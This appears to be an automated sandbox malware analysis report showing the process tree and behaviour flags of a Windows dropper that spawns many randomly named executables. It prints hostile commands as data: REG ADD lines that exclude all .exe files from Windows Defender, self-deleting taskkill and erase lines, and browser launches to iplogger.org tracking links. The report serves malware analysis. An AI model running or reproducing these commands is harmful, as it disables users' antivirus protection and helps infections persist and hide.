File.exe8ZCfgm0NuWkp7PKQifskxkTL.exeLzWgYoMzjeu0S_yZPBZpgsk3.exeIvsskHJfubsqZ5nFS_xpOLRK.exeVdcmpLWQ4sQClzr_v_nHf2ng.exePSJX3kTgFrzS6xbKJXjbH2XR.exeNROUveYetDLp89YeLjvoyKcP.exeT4GuP5xLZ5KygBfWzf7jpOvR.exeMFPmIIhwR3njJSHvNPzgPYo6.exebeb9YTbvJFLvLXX592jpxOvD.exeSm_lvl2URwt3bkdpYbN6ppsk.exe9hvXSXrdixXuUYtM4HT7kFel.exeUPLs6tY8WjwSKiXVW8fL8JqY.exeImMSMmAqtHpIJOu_JPRVxsxL.exeZh3M5OU4FZcI7PVNDwUeCUKJ.exedhgUgg1lwzVFLeDAWWwO2YJd.exe1BwX9cFBeToivHJC1osbHAsz.exe1.exeInstall.exeInstall.exec8543649-03e9-461c-bb64-bc5598521773.exejg1_1faf.exeSearchApp.exeSearchApp.exepid process 3476 File.exe 2928 8ZCfgm0NuWkp7PKQifskxkTL.exe 4100 LzWgYoMzjeu0S_yZPBZpgsk3.exe 2616 IvsskHJfubsqZ5nFS_xpOLRK.exe 4108 VdcmpLWQ4sQClzr_v_nHf2ng.exe 2624 PSJX3kTgFrzS6xbKJXjbH2XR.exe 3000 NROUveYetDLp89YeLjvoyKcP.exe 3344 T4GuP5xLZ5KygBfWzf7jpOvR.exe 3012 MFPmIIhwR3njJSHvNPzgPYo6.exe 368 beb9YTbvJFLvLXX592jpxOvD.exe 4140 Sm_lvl2URwt3bkdpYbN6ppsk.exe 2516 9hvXSXrdixXuUYtM4HT7kFel.exe 2536 UPLs6tY8WjwSKiXVW8fL8JqY.exe 4132 ImMSMmAqtHpIJOu_JPRVxsxL.exe 3220 Zh3M5OU4FZcI7PVNDwUeCUKJ.exe 4148 dhgUgg1lwzVFLeDAWWwO2YJd.exe 4116 1BwX9cFBeToivHJC1osbHAsz.exe 3668 1.exe 4460 Install.exe 3236 Install.exe 5448 c8543649-03e9-461c-bb64-bc5598521773.exe 5324 jg1_1faf.exe 1816 SearchApp.exe 5756 SearchApp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Setup_x32_x64.exemsedge.exemsedge.exemsedge.exeFolder.exedescription pid process target process PID 3868 wrote to memory of 3704 3868 Setup_x32_x64.exe msedge.exe PID 3868 wrote to memory of 3704 3868 Setup_x32_x64.exe msedge.exe PID 3868 wrote to memory of 3716 3868 Setup_x32_x64.exe Proxyupd.exe PID 3868 wrote to memory of 3716 3868 Setup_x32_x64.exe Proxyupd.exe PID 3868 wrote to memory of 3716 3868 Setup_x32_x64.exe Proxyupd.exe PID 3704 wrote to memory of 2500 3704 msedge.exe msedge.exe PID 3704 wrote to memory of 2500 3704 msedge.exe msedge.exe PID 3868 wrote to memory of 3692 3868 Setup_x32_x64.exe msedge.exe PID 3868 wrote to memory of 3692 3868 Setup_x32_x64.exe msedge.exe PID 3868 wrote to memory of 3200 3868 Setup_x32_x64.exe Folder.exe PID 3868 wrote to memory of 3200 3868 Setup_x32_x64.exe Folder.exe PID 3868 wrote to memory of 3200 3868 Setup_x32_x64.exe Folder.exe PID 3868 wrote to memory of 2440 3868 Setup_x32_x64.exe RobCleanerInstl3183813.exe PID 3868 wrote to memory of 2440 3868 Setup_x32_x64.exe RobCleanerInstl3183813.exe PID 3868 wrote to memory of 2440 3868 Setup_x32_x64.exe RobCleanerInstl3183813.exe PID 3692 wrote to memory of 3508 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3508 3692 msedge.exe msedge.exe PID 3868 wrote to memory of 1292 3868 Setup_x32_x64.exe soft.exe PID 3868 wrote to memory of 1292 3868 Setup_x32_x64.exe soft.exe PID 3868 wrote to memory of 1292 3868 Setup_x32_x64.exe soft.exe PID 3868 wrote to memory of 368 3868 Setup_x32_x64.exe msedge.exe PID 3868 wrote to memory of 368 3868 Setup_x32_x64.exe msedge.exe PID 3868 wrote to memory of 3372 3868 Setup_x32_x64.exe askinstall49.exe PID 3868 wrote to memory of 3372 3868 Setup_x32_x64.exe askinstall49.exe PID 3868 wrote to memory of 3372 3868 Setup_x32_x64.exe askinstall49.exe PID 368 wrote to memory of 1216 368 msedge.exe msedge.exe PID 368 wrote to memory of 1216 368 msedge.exe msedge.exe PID 3868 wrote to memory of 3476 3868 Setup_x32_x64.exe File.exe PID 3868 wrote to memory of 3476 3868 Setup_x32_x64.exe File.exe PID 3868 wrote to memory of 3476 3868 Setup_x32_x64.exe File.exe PID 3200 wrote to memory of 1868 3200 Folder.exe Folder.exe PID 3200 wrote to memory of 1868 3200 Folder.exe Folder.exe PID 3200 wrote to memory of 1868 3200 Folder.exe Folder.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe PID 3692 wrote to memory of 3656 3692 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup_x32_x64.exe"C:\Users\Admin\AppData\Local\Temp\Setup_x32_x64.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Uaqy72⤵
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffab2de46f8,0x7ffab2de4708,0x7ffab2de47183⤵PID:2500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,5937278540378143348,12863368217294888884,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:23⤵PID:1232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,5937278540378143348,12863368217294888884,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:33⤵PID:2920
-
-
-
C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe"C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Btnm72⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffab2de46f8,0x7ffab2de4708,0x7ffab2de47183⤵PID:3508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:23⤵PID:3656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:2812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:83⤵PID:3408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:13⤵PID:3824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:13⤵PID:3184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:13⤵PID:764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:13⤵PID:2224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2408 /prefetch:13⤵PID:2480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵PID:3220
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1bc,0x22c,0x7ff63e8f5460,0x7ff63e8f5470,0x7ff63e8f54804⤵PID:3752
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6060 /prefetch:83⤵PID:2516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6060 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:4088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3816 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
PID:3556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:13⤵PID:4656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:13⤵PID:5716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4796 /prefetch:83⤵PID:3932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6344 /prefetch:83⤵PID:5148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6180 /prefetch:83⤵PID:5180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6196 /prefetch:83⤵PID:3576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4820 /prefetch:83⤵PID:5808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6200 /prefetch:83⤵PID:3668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4860 /prefetch:83⤵PID:6120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3356 /prefetch:83⤵PID:2284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4860 /prefetch:83⤵PID:6012
-
-
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -u3⤵
- Executes dropped EXE
PID:1868
-
-
-
C:\Users\Admin\AppData\Local\Temp\RobCleanerInstl3183813.exe"C:\Users\Admin\AppData\Local\Temp\RobCleanerInstl3183813.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:2440 -
C:\Users\Admin\AppData\Local\Temp\48b85f34-ba76-4a43-8811-51001d013e78.exe"C:\Users\Admin\AppData\Local\Temp\48b85f34-ba76-4a43-8811-51001d013e78.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3980
-
-
-
C:\Users\Admin\AppData\Local\Temp\File.exe"C:\Users\Admin\AppData\Local\Temp\File.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3476 -
C:\Users\Admin\Pictures\Adobe Films\dhgUgg1lwzVFLeDAWWwO2YJd.exe"C:\Users\Admin\Pictures\Adobe Films\dhgUgg1lwzVFLeDAWWwO2YJd.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:4148 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 7604⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6060
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 12884⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1080
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 12964⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 9084⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6112
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 13284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5280
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "dhgUgg1lwzVFLeDAWWwO2YJd.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\dhgUgg1lwzVFLeDAWWwO2YJd.exe" & exit4⤵PID:4704
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "dhgUgg1lwzVFLeDAWWwO2YJd.exe" /f5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3200
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Sm_lvl2URwt3bkdpYbN6ppsk.exe"C:\Users\Admin\Pictures\Adobe Films\Sm_lvl2URwt3bkdpYbN6ppsk.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4140 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 4524⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:5876
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ImMSMmAqtHpIJOu_JPRVxsxL.exe"C:\Users\Admin\Pictures\Adobe Films\ImMSMmAqtHpIJOu_JPRVxsxL.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:4132 -
C:\Users\Admin\Pictures\Adobe Films\ImMSMmAqtHpIJOu_JPRVxsxL.exe"C:\Users\Admin\Pictures\Adobe Films\ImMSMmAqtHpIJOu_JPRVxsxL.exe"4⤵
- Executes dropped EXE
PID:4976
-
-
-
C:\Users\Admin\Pictures\Adobe Films\P1YB1hAG63Ao1gEROgD7fk7o.exe"C:\Users\Admin\Pictures\Adobe Films\P1YB1hAG63Ao1gEROgD7fk7o.exe"3⤵
- Executes dropped EXE
PID:4124 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C del C:\Users\Admin\Pictures\Adobe Films\P1YB1hAG63Ao1gEROgD7fk7o.exe4⤵PID:5812
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1BwX9cFBeToivHJC1osbHAsz.exe"C:\Users\Admin\Pictures\Adobe Films\1BwX9cFBeToivHJC1osbHAsz.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4116 -
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5324
-
-
-
C:\Users\Admin\Pictures\Adobe Films\VdcmpLWQ4sQClzr_v_nHf2ng.exe"C:\Users\Admin\Pictures\Adobe Films\VdcmpLWQ4sQClzr_v_nHf2ng.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4108
-
-
C:\Users\Admin\Pictures\Adobe Films\LzWgYoMzjeu0S_yZPBZpgsk3.exe"C:\Users\Admin\Pictures\Adobe Films\LzWgYoMzjeu0S_yZPBZpgsk3.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4100
-
-
C:\Users\Admin\Pictures\Adobe Films\8ZCfgm0NuWkp7PKQifskxkTL.exe"C:\Users\Admin\Pictures\Adobe Films\8ZCfgm0NuWkp7PKQifskxkTL.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2928 -
C:\Users\Admin\AppData\Local\Temp\7zSE9B9.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4460 -
C:\Users\Admin\AppData\Local\Temp\7zS5237.tmp\Install.exe.\Install.exe /S /site_id "525403"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:3236 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:5924
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:5548
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:5916
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:5496
-
-
-
-
